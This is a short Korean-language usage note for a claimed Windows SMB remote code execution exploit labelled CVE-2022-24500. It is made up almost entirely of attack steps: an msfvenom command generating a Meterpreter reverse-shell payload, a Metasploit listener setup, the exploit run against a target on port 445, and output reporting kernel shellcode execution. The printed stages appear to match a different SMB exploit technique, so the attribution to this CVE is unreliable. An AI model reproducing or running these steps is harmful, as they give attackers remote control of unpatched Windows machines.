
CVE-2022-24500에 대한 Windows SMB 원격 코드 실행 익스플로잇으로, Windows 7부터 Windows Server 2022까지 취약한 시스템에 대해 Meterpreter 리버스 셸 페이로드를 생성하고 셸코드를 실행합니다.
취약점: Windows 7 - Windows 2022 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24500
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.10.22.105 LPORT=4444 -f raw > shellcode.bin
msf5 > use multi/handler
msf5 exploit(multi/handler) > set LHOST 192.10.22.105
LHOST => 192.10.22.105
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > run
CVE-2022-24500 ip port
C:\>CVE-2022-24500.exe 192.10.22.107 445
CVE-2022-24500 SMB 원격 익스플로잇
[+] 확인 중... 192.10.22.107 445
[+] 192.10.22.107 445 열림
[+] 낮은 스텁을 물리 주소 13000에서 발견!
[+] PML4 at 1ad000
[+] HAL 힙 베이스 at fffff79480000000
[+] ntoskrnl 진입점 at fffff80645792010
[+] PML4 자체 참조 항목 1eb 발견
[+] HalpInterruptController at fffff79480001478 발견
[+] HalpApicRequestInterrupt at fffff80645cb3bb0 발견
[+] shellcode.bin 로드
[+] 쉘코드 생성 완료!
[+] KUSER_SHARED_DATA PTE at fffff5fbc0000000
[+] KUSER_SHARED_DATA PTE NX 비트 제거됨!
[+] fffff78000000a00에 쉘코드 기록!
[+] 쉘코드 실행 시도!
[+] 익스플로잇 성공!
